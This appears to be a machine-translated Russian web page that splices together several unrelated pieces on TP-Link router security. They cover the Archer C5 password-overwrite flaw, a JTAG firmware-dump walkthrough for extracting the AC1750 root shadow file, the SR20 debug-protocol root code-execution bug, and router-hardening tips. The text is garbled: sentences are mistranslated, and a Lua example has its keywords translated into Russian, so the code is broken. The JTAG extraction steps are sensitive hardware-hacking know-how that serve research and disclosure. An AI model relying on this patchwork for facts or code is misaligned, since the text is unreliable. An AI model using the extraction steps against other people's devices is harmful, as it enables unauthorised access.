Компания TP-Link обновила прошивку. Если вы установите это обновление прошивки, tplink_smartplug.py больше не будет работать.
ОБНОВЛЕНИЕ 07.04.2018 :
Мы обновили наш инструмент. Теперь он поддерживает TP-Link HS100, HS105 и HS110 с последней прошивкой. Также поддерживаются имена хостов вместо IP-адресов, и теперь скрипт можно импортировать как модуль Python.Большое спасибо тем, кто открывал проблемы и пулл-реквесты на GitHub.
О других интересных темах читайте в нашем блоге.
Маршрутизаторы TP-Link позволяют любому изменить ваш пароль WiFi
В настоящее время мы можем найти маршрутизаторы практически везде, будь то рабочие места, торговые центры, школы и дома, люди нуждаются (или думают, что нуждаются) в постоянном подключении к Интернету. Однако, несмотря на широкое использование, маршрутизаторы относятся к технологическим устройствам с наибольшим количеством недостатков безопасности, что обеспечивают экспертов по этичному взлому .
Исследовательская группа X-Force из известного технологическая компания IBM опубликовала отчет об обнаружении уязвимости нулевого дня в прошивка TP-Link Маршрутизаторы Archer C5, версия 4.
Это первая работа над этим недостатком, присутствуют в решениях компании для дома и бизнеса. По мнению исследователей в области этического взлома, в случае эксплуатации эта уязвимость позволит удаленному злоумышленнику получить контроль над настройками устройства через Telnet для подключения к серверу протокола передачи файлов (FTP) через локальную или глобальную сеть.
Эксплуатация этой уязвимости может привести к привилегии администратора злоумышленника из-за характеристик, присущих этим устройств, поэтому это считается критическим уровнем серьезности.
Кроме того, риск возрастает в корпоративных средах, поскольку на маршрутизаторах часто включен гостевой WiFi . Скомпрометированное устройство в корпоративной среде может быть использовано хакером для относительно легкого проникновения в сети компании, откуда он может использовать некоторые маневры распознавания сети и атаки по сторонним каналам.
После открытия команда IBM из исследователи сообщили об уязвимости в TP-Link по параметрам устанавливается сообществом кибербезопасности. Компания приняла отчет и объявил о ряде мер по снижению риска эксплуатации.
Проще говоря, уязвимые HTTP-запросы приводят к переопределение пароля администратора устройства. Когда короче, чем ожидалось строка передается как пароль пользователя, значение пароля в некоторых местах искажено байты, отличные от ASCII.С другой стороны, если строка слишком длинная, пароль полностью переопределяется и заменяется пустым значением. Эти устройства имеют только один тип пользователя (администратор с привилегиями root), поэтому хакер может занять место администратора, чтобы взять под контроль затронутое устройство.
Чтобы активировать уязвимость и получить контроль над устройством, требуется только отправка правильного запроса, как показано в следующем примере. Можно утверждать, что существует два типа запросов: безопасные и уязвимые.Неуязвимый HTML-запрос имеет два параметра: TokenID и JSESSIONID. Однако проверка CGI основана только на HTTP-заголовках ссылки. Если это соответствует IP-адресу или связанному домену, сервер маршрутизатора распознает его как действительный.
Если этот реферер будет удален из заголовка, запрос вернет ответ «Запрещено».
Эта проблема одинаково влияет на HTTP-запросы POST и GET, переопределяя пароль администратора, когда длина строки превышает допустимое количество байтов; Таким образом, это своего рода сбой переполнения, отмечают эксперты по этичному взлому.
Используя номер версии микросхемы памяти, исследователи нашли всю информацию о прошивке устройства. Вовремя при извлечении этой информации в памяти был обнаружен закрытый ключ RSA. Этот ключ используется для шифрования и расшифровки паролей пользователей при доступе к веб-интерфейс роутера.
После распаковки прошивки были найдены данные для входа в папку rootfs/etc. Имя пользователя и пароль по умолчанию были очень слабыми. Если оставить комбинацию по умолчанию без изменений, можно разрешить доступ к FTP-серверу и предоставить доступ к консоли.
Получив root-доступ, исследователи получили некоторый контроль над двоичными файлами. С помощью некоторых инструментов был выполнен статический и динамический анализ, чтобы точно определить, где находится уязвимость. Ниже приведена соответствующая часть проанализированного заголовка HTTP, отображаемого в IDA:
.Следующим шагом было проверить, что происходит с файлом паролей, когда уязвимый запрос отправляется с использованием строки разной длины, отправляя пароль длиннее допустимого количества символов.
Пароль полностью отозван, и его значение пусто.С этого момента можно получить доступ к TELNET и FTP без пароля, используя только «admin» в качестве имени пользователя, который является единственным пользователем, доступным на устройстве по умолчанию.
Международный институт кибербезопасности (IICS) специалисты по этичному взлому рекомендуют пользователям, которые не обновили их системы попадают на официальный сайт TP-Link, где помимо обновлений готов к установке, они найдут другие доступные сведения о инцидент.
Он является известным экспертом в области мобильной безопасности и анализа вредоносных программ.Он изучал компьютерные науки в Нью-Йоркском университете и начал работать аналитиком по кибербезопасности в 2003 году. Он активно работает экспертом по защите от вредоносных программ. Он также работал в охранных компаниях, таких как «Лаборатория Касперского». Его повседневная работа включает в себя изучение новых вредоносных программ и инцидентов кибербезопасности. Также он обладает глубокими знаниями в области мобильной безопасности и мобильных уязвимостей.
Реверс-инжиниринг оборудования: взлом корневого пароля маршрутизатора TP-Link AC1750 с помощью JTAG
Автор Kang-Wei Chang | Здесь, в исследовательском центре Application and Threat Intelligence (ATI), мы занимаемся созданием атак на основе уязвимостей и эксплойтов, которые наши клиенты используют для проверки своих систем кибербезопасности.Время от времени это включает в себя поиск уязвимостей нулевого дня и взлом оборудования. Это один из тех моментов. У нас есть несколько таких проектов, но этот самый дальний, и я хотел бы поделиться им с вами. Я делаю это один из первых раз, так что терпите меня, и я покажу вам основные шаги, которые я предпринял для подключения к маршрутизатору и извлечения прошивки.
Давайте покопаемся в этом буквально. Есть несколько способов обратного проектирования оборудования, например: UART, SPI, JTAG.Сегодня я использую один из самых мощных протоколов — JTAG (Joint Test Action Group). В этом блоге цель состоит в том, чтобы показать, как я могу сбросить прошивку (FW) и получить пароль root shadow. JTAG даст мне возможность не только делать дамп FW, но и читать регистры ЦП и память. Возможно, позже я смогу изучить их, а пока давайте эту прошивку.
Необходимые инструменты:
- Маршрутизатор TP-Link AC1750
- Отладочная плата JTAG — это может быть пиратская шина или любая отладочная плата JTAG, в этой статье я использую Attify Badge, так как он доступен на нашем столе
- Соединительные провода
- Любая операционная система, которая может запускать OpenOCD, я использую AttifyOS, которая бесплатна и настроена для использования Интернета вещей (IoT)
Начнем процесс!
НАСТРОЙКА ОБОРУДОВАНИЯ
Вскроем роутер и посмотрим, что внутри.На этот раз мы решили не использовать молоток.
В левом нижнем углу есть два раздела, на которые следует обратить внимание:
Этот маршрутизатор имеет распиновку отладки протоколов JTAG и UART, к счастью для нас. Я также нашел в Интернете схему контактов JTAG, так что проводка довольно проста. Если бы это было недоступно, мы могли бы просто использовать инструмент, такой как JTAGulator, для определения распиновки. В следующий раз!
После подключения всех проводов для протокола JTAG (TDI, TDO, TCK, TMS, GND) это будет выглядеть следующим образом.
НАСТРОЙКА ПРОГРАММНОГО ОБЕСПЕЧЕНИЯ
Следующий шаг, давайте подключим его к компьютеру. Во-первых, убедитесь, что ваша отладочная плата подключена к вашей ОС (для дистрибутива Linux проверьте, существует ли USB-устройство /dev/ttyUSB0).
Затем убедитесь, что ваш OpenOCD актуален. Я выбираю ручную компиляцию, чтобы убедиться, что он поддерживает наш целевой ЦП (проверьте ссылку для компиляции).
Также убедитесь, что наш целевой файл ath79.cfg существует, он должен находиться по адресу:
/usr/share/openocd/script/target/ath79.Конфигурация
Затем включите маршрутизатор и запустите наш OpenOCD, используя следующую команду:
sudo openocd –f [файл конфигурации платы] –f [файл конфигурации процессора маршрутизатора]
После выполнения не должно быть ошибки, если ошибка присутствует, погуглите.
JTAG-КОМАНДА
OpenOCD откроет порт 4444 на локальном хосте, ожидая соединения. Теперь попробуем через telnet.
Отлично! Теперь мы можем использовать JTAG, чтобы делать много вещей на этом маршрутизаторе.В этом посте мы хотим извлечь прошивку. Сделайте это с помощью следующих команд:
С помощью флеш-банков мы выяснили, что образ находится по адресу 0xbf00000000 и имеет размер 0x01000000.
Далее мы можем использовать следующую команду для создания дампа файла образа.
dump_image [имя файла] смещение адреса
Этот шаг займет очень много времени. К сожалению, после сброса изображения мой терминал не ответил успешно, но файл был на месте.
Теперь, когда у нас есть прошивка, давайте посмотрим на binwalk:
Binwalk увидит его как файловую систему squashfs. Теперь давайте воспользуемся binwalk для получения исходного кода.
binwalk –Прошивка Me.bin
И получаем после распаковки папку:
Давайте посмотрим и увидим файл теней! В теневом файле фактический пароль хранится в зашифрованном формате.
Я не собираюсь здесь взламывать пароль, но если вы воспользуетесь своим гугл-фу, вы легко найдете взломанный пароль.С паролем root мы можем войти в маршрутизатор, используя UART/SSH с привилегиями root.
ОБЗОР
Мы получили прошивку! В этом посте рассматривается основной процесс реверсирования прошивки маршрутизатора с использованием протокола JTAG.
Следующим шагом является поиск первоначальных уязвимостей. Для этого нужно зайти в недавно выпущенный инструмент FW Slap и посмотреть, что он может найти. Оттуда исследователи ATI могли бы превратить этот вывод в CVE и выпущенный ATI Strike.
ИСПОЛЬЗУЙТЕ СЛУЖБУ ПОДПИСКИ, ЧТОБЫ ОСТАВАТЬСЯ ВПЕРЕДИ
Подписка Ixia BreakingPoint Application and Threat Intelligence (ATI) предоставляет раз в две недели обновления последних протоколов приложений и атак для использования с платформами Ixia.
Маршрутизатор нулевого дня TP-Linkпредлагает вашу сеть для хакеров – Naked Security
Буквально на прошлой неделе мы говорили в подкасте Naked Security о том, что вы можете сделать, если у вас есть маршрутизатор с дырами в безопасности, которые вы не можете легко исправить.
Это может произойти, если ваш интернет-провайдер не позволит вам подключиться на вашем конце, если вы не используете предоставленный им маршрутизатор.
Эти «принудительные маршрутизаторы», как правило, заблокированы, поэтому вы не можете обновлять их самостоятельно, и у них может быть даже постоянно включен удаленный доступ, чтобы ваш интернет-провайдер мог вмешиваться в них по своему желанию.
Наша рекомендация, когда вы сталкиваетесь с чужим маршрутизатором в своем собственном доме, просто относиться к нему так, как если бы он находился за много миль на другом конце вашей телефонной линии или кабельного соединения, в центре обработки данных интернет-провайдера или на телефоне. местная биржа компании, где вы не можете ее увидеть.
Купите второй маршрутизатор (или получите себе бесплатную версию Sophos XG Firewall Home Edition), подключите порт LAN маршрутизатора провайдера (внутренний) к порту WAN (внешний) устройства, за которым вы следите, и притворитесь, что оборудование провайдера не существовать.
Не беспокойтесь о частях Wi-Fi и брандмауэре маршрутизатора интернет-провайдера — просто относитесь к нему как к прямому модему, который соединяет вашу домашнюю сеть Ethernet с телефонной, кабельной или оптоволоконной сетью, используемой вашим интернет-провайдером.
К сожалению, такой подход «маршрутизатор внутри маршрутизатора» не всегда эффективен.
Вот пример того, когда это решение выходит из строя: разработчик безопасности Google только что опубликовал подробную информацию об ошибке в типе домашнего маршрутизатора, который специально разработан для интеграции с вашим комплектом домашней автоматизации и, следовательно, в любом случае должен быть вашим внутренним маршрутизатором.
Ошибка была обнаружена в маршрутизаторе TP-Link SR20, устройстве, которым было бы бессмысленно владеть, если бы вы подключили его через другой маршрутизатор, чтобы защитить от него свою собственную сеть.
Другими словами, ваша главная причина иметь SR20 будет заключаться в том, чтобы установить его в ядре вашей домашней сети, где он сможет работать с вашим комплектом «умного дома» TP-Link, таким как лампочки, вилки и камеры, как а также взаимодействовать со специальным мобильным приложением TP-Link Kasa.
Kasa — это каламбур, учитывая, что casa — это латинское слово для того, что в германских языках, таких как английский, голландский и шведский, называют дом / huis / hus , и до сих пор используется для обозначения дом на многих романских языках, включая португальский, испанский, итальянский и румынский.
К счастью, эту уязвимость TP-Link нельзя использовать удаленно — по крайней мере, по умолчанию — поэтому маршрутизаторы SR20 автоматически не подвергаются атакам со стороны кого-либо из Интернета.
Но сама ошибка, тем не менее, серьезная и является удобным напоминанием о том, что может пойти не так, когда разработчики позволяют себе застрять (или, по крайней мере, застрять) в прошлом, поддерживая старый и небезопасный код вместе с последней, более безопасной версией. .
Как возникла ошибка?
SR20 поддерживает собственный протокол, используемый TP-Link для отладки.
Интерфейсы отладки на аппаратных устройствах часто проблематичны, потому что они обычно существуют для того, чтобы разработчики или персонал службы поддержки могли детально изучить внутренности устройства и извлечь (а иногда и изменить) информацию и настройки, которые обычно защищены от несанкционированного доступа.
Интересно, что один из первых интернет-вирусов, так называемый червь Морриса 1988 года, смог распространиться благодаря функции отладки в популярном почтовом сервере sendmail
.
Эта функция не должна была быть включена на рабочих серверах, но многие администраторы просто забыли ее отключить.
Настройка отладки sendmail
предписывает серверу обрабатывать специально созданные электронные письма не как сообщения, а как список системных команд, которые должны выполняться автоматически.
Вы можете в буквальном смысле послать удаленному серверу сообщение с приказом заразить себя, после чего он попытается отправить себя следующему парню и так далее, и все это без пароля.
Что ж, для владельцев TP-Link SR20 снова 1988 год, хотя злоумышленнику уже нужна точка опоры внутри вашей сети.
Жизнь с прошлым
Проще говоря, эта ошибка связана с тем, что на жаргоне известно как атака с понижением версии .
Судя по всему, ранние маршрутизаторы TP-Link с радостью выполняли команды отладки для любого, кто мог отправлять сетевые пакеты в локальную сеть маршрутизатора — вы могли получить доступ к функциям отладки, не вводя и даже не зная пароля.
Эта слабость, по-видимому, была исправлена путем введения нового набора команд отладки «версии 2», которые работают, только если вы знаете и предоставляете пароль администратора — разумная мера предосторожности, которая ограничивает активность уровня администратора пользователями уровня администратора.
Однако, по словам исследователя Google Мэтью Гарретта, вы все же можете убедить маршрутизатор принять некоторые опасные команды версии 1, вообще не нуждаясь в пароле.
Вы просто вежливо просите маршрутизатор вернуться к старым временам, когда пароли не считались необходимыми для отладки.
Ошибка команды в этом случае номер 49, известный довольно мягко как CMD_FTEST_CONFIG
.
Можно было бы надеяться, что команда, выполняющая какой-либо тест конфигурации, в худшем случае сообщит, пройден тест или нет, но эта команда гораздо шире.
Как работает ошибка?
Garrett декомпилировал соответствующую часть отладочного сервера в прошивке TP-Link и обнаружил, что CMD_FTEST_CONFIG
работает примерно так:
- Вы отправляете на сервер
имя_файла
и какие-то произвольныедополнительные_данные
. - Сервер снова подключается к вашему компьютеру с помощью TFTP (тривиальный протокол передачи файлов) и загружает файл с именем
имя_файла
. - Сервер предполагает, что данные, которые он только что загрузил, представляют собой программу Lua, которая включает функцию с именем
config_test()
. - Сервер загружает предоставленную программу Lua и вызывает функцию
config_test()
с вашимидополнительными_данными
в качестве аргумента.
Lua — это бесплатный легкий скриптовый язык с открытым исходным кодом из Бразилии, который используется во многих популярных продуктах для обеспечения безопасности, включая Wireshark и Nmap , и широко используется в маршрутизаторах из-за его крошечного размера.
Сервер отладки TP-Link работает от имени пользователя root — Linux-эквивалент объединенных учетных записей Windows SYSTEM
и Administrator
— поэтому его механизм сценариев Lua работает от имени пользователя root, поэтому ваша прилагаемая программа работает от имени пользователя root, поэтому ваш config_test ()
работает от имени пользователя root, поэтому вы можете делать с маршрутизатором все, что захотите.
Плохая новость заключается в том, что даже если злоумышленник мало знает о Lua, сам язык включает встроенную функцию под названием os.execute()
, который делает именно то, что предполагает его название…
… и запускает команду операционной системы по вашему выбору.
Lua также имеет удобную функцию io.popen()
, которая запускает системную команду, собирает выходные данные и возвращает их обратно в программу, чтобы вы могли понять, что делать дальше.
-- Пример кода Lua для запуска системной команды -- и получить ответ построчно... uidcmd = io.popen('id -u') getuid = uidcmd:lines () если getuid() == '0', то print 'Вы root!' конец -- или просто... если io.popen('id -u'):lines()() == '0', то напечатайте 'Вы root!' конец
Короче говоря, любой, кто может отправлять сетевой трафик на порты LAN на вашем маршрутизаторе, может в значительной степени контролировать вашу сеть.
Если ваш Wi-Fi защищен паролем, злоумышленнику нужно будет знать ключ Wi-Fi (тот, который обычно пишется на стене кофейни), но это все — пароль роутера ему также не понадобится .
Что было дальше?
Плохая часть этой истории заключается в том, что Гарретт говорит, что он никогда не получал никаких отзывов от TP-Link после того, как связался с компанией через, кажется, ее официальную страницу с рекомендациями по безопасности.
Согласно TP-Link:
Инженеры по безопасности и другие технические специалисты могут [использовать эту форму] для отправки отзывов о наших функциях безопасности. Ваша информация будет обработана нашими инженерами по сетевой безопасности. Вы получите ответ в течение 1-3 рабочих дней.
Но Гаррет говорит, что ответа так и не пришло; он попытался написать сообщение в основной аккаунт TP-Link в Твиттере, но так и не получил ответа.
Поскольку его первоначальный отчет был сделан в декабре 2018 года, Гаррет теперь обнародовал свои выводы, следуя политике Google, согласно которой 90 дней должно быть достаточно, чтобы поставщик мог решить проблему безопасности такого рода.
Вы можете подумать, что использование Твиттера в качестве средства для официальных уведомлений, в котором говорится: «Уважаемый поставщик, часы официального раскрытия информации об ошибках тикают, и у вас есть 90 дней или больше», может показаться немного небрежным, но, как обнаружил Гарретт, TP-Link официальная страница обратной связи по безопасности не предлагает никакого способа оставаться на связи, кроме как предоставить компании свой собственный адрес электронной почты и дождаться ответа.
Что делать?
- Если вы являетесь частью команды безопасности TP-Link , вы, вероятно, захотите признать эту проблему и объявить дату, к которой вы сможете ее исправить, или, по крайней мере, предоставить обходной путь.Создается впечатление, что простое отключение (или предоставление возможности отключения) неавторизованного доступа к серверу отладки было бы быстрым решением.
- Если вы программист , не запускайте серверы как root. Код, который принимает пакеты данных из любой точки сети, не должен обрабатывать эти пакеты от имени root на случай, если что-то пойдет не так. Если мошенники найдут уязвимость в вашем сетевом коде и придумают эксплойт, зачем в то же время наделять их полномочиями корневого уровня?
- Если у вас есть затронутый маршрутизатор , имейте в виду, что любой, кому вы разрешите доступ к вашей сети Wi-Fi, может довольно легко перехватить его, используя код проверки концепции Garrett.В частности, если вы управляете кофейней или другим общим пространством, избегайте использования SR20 в качестве бесплатной точки доступа Wi-Fi.
- Какой бы марки маршрутизатора у вас ни был , войдите в интерфейс администрирования и проверьте настройки Удаленный доступ . Дома вам почти никогда не нужно или не хочется позволять посторонним видеть внутреннюю часть вашей сети, поэтому убедитесь, что удаленный доступ отключен, если вы не уверены, что он вам нужен.
- Если вы являетесь ИТ-поставщиком и имеете официальный канал для получения отчетов об ошибках , позаботьтесь о том, чтобы ни один из них не проскользнул мимо ушей.Обеспечьте четкий канал для будущих коммуникаций, например, специальный адрес электронной почты, по которому исследователи смогут связаться в случае необходимости.
- Если вы работаете в отделе маркетинга и видите техническое сообщение в своей ленте Twitter, найдите нужного человека, с которым можно поговорить внутри компании, и передайте сообщение. Не усложняйте жизнь людям, которые пытаются вам помочь.
Как защитить беспроводной маршрутизатор от взлома
Ваш беспроводной маршрутизатор является главной целью для хакеров, которые хотят проникнуть в вашу сеть или бесплатно использовать ваше соединение Wi-Fi.Точно так же, как ничто не является полностью водонепроницаемым, нет такой вещи, как защита от взлома или защита от хакеров. Но вы можете создавать системы, «устойчивые к взлому», и в этой статье мы покажем вам, как это сделать.
Включить беспроводное шифрование WPA2 или WPA3
Если вы не используете минимальное шифрование Wi-Fi Protected Access 2 (WPA2) для защиты своей беспроводной сети, это оставляет вашу сеть широко открытой, потому что хакеры могут практически проникнуть в вашу сеть.
Если вы используете устаревшую систему безопасности Wired Equivalent Privacy (WEP), которую большинство хакеров может взломать за считанные секунды, обновите ее до WPA2 или, что предпочтительнее, до WPA3, который обратно совместим с WPA2.Для более старых маршрутизаторов может потребоваться обновление прошивки, чтобы добавить функции WPA2 или WPA3. Обратитесь к руководству производителя вашего маршрутизатора, чтобы узнать, как включить беспроводное шифрование WPA2\WPA3 на вашем маршрутизаторе.
Годфрид Эдельман / Getty ImagesСоздайте надежное сетевое имя SSID и общий ключ
Вам также потребуется создать надежный SSID (имя беспроводной сети). Если вы используете сетевое имя маршрутизатора по умолчанию (например, Linksys, Netgear или DLINK), хакерам будет легче взломать вашу сеть.Использование стандартного или обычного SSID помогает хакерам взломать ваше шифрование, поскольку они могут использовать готовые радужные таблицы, связанные с распространенными именами SSID, для взлома вашего беспроводного шифрования.
Создайте длинное и случайное имя SSID, даже если его трудно запомнить. Вы также должны использовать надежный пароль для своего предварительного общего ключа, чтобы еще больше воспрепятствовать попыткам взлома.
Включите брандмауэр беспроводного маршрутизатора
Если вы этого не сделали, включите встроенный брандмауэр вашего беспроводного маршрутизатора.Включение брандмауэра может сделать вашу сеть менее заметной для хакеров, ищущих цели в Интернете. Многие брандмауэры на основе маршрутизаторов имеют скрытый режим, который можно включить, чтобы уменьшить видимость вашей сети. Кроме того, проверьте свой брандмауэр, чтобы убедиться, что вы правильно его настроили.
Использовать зашифрованную персональную службу VPN на уровне маршрутизатора
Раньше виртуальные частные сети были роскошью, которую могли себе позволить только крупные корпорации. Теперь вы можете купить персональный VPN-сервис за небольшую ежемесячную плату.Персональный VPN — одно из самых больших препятствий, которое вы можете бросить хакеру.
Персональный VPN анонимизирует ваше истинное местоположение с помощью проксируемого IP-адреса и создает стену надежного шифрования для защиты вашего сетевого трафика. Вы можете приобрести личную услугу VPN у таких поставщиков, как WiTopia, StrongVPN и других, всего за 10 долларов в месяц или меньше.
Если ваш маршрутизатор поддерживает личную службу VPN на уровне маршрутизатора, это лучший способ реализовать личную VPN. Это позволяет вам шифровать весь трафик, входящий и исходящий из вашей сети, без хлопот с настройкой программного обеспечения VPN-клиента на ваших компьютерах.
Использование личного VPN-сервиса на уровне маршрутизатора также снимает нагрузку с ваших клиентских ПК и других устройств в процессе шифрования. Если вы хотите использовать личную VPN на уровне маршрутизатора, проверьте, поддерживает ли ваш маршрутизатор VPN. У многих производителей есть несколько моделей маршрутизаторов с такой возможностью.
Отключите функцию администрирования через беспроводную связь на вашем маршрутизаторе
Еще один способ предотвратить вмешательство хакеров в ваш беспроводной маршрутизатор — отключить администратора в настройках беспроводной сети.Когда вы отключаете функцию администрирования через беспроводную сеть на своем маршрутизаторе, это делает так, что только тот, кто физически подключен к вашему маршрутизатору с помощью кабеля Ethernet, может получить доступ к функциям администрирования вашего беспроводного маршрутизатора. Это не позволит кому-либо проехать мимо вашего дома и получить доступ к административным функциям вашего маршрутизатора, если они скомпрометировали ваше шифрование Wi-Fi.
При наличии достаточного количества времени и ресурсов хакер может взломать вашу сеть. Тем не менее, выполнение описанных выше шагов сделает вашу сеть более сложной целью, что, как мы надеемся, расстроит хакеров и заставит их перейти к более легкой цели.
Ваш комментарий будет первым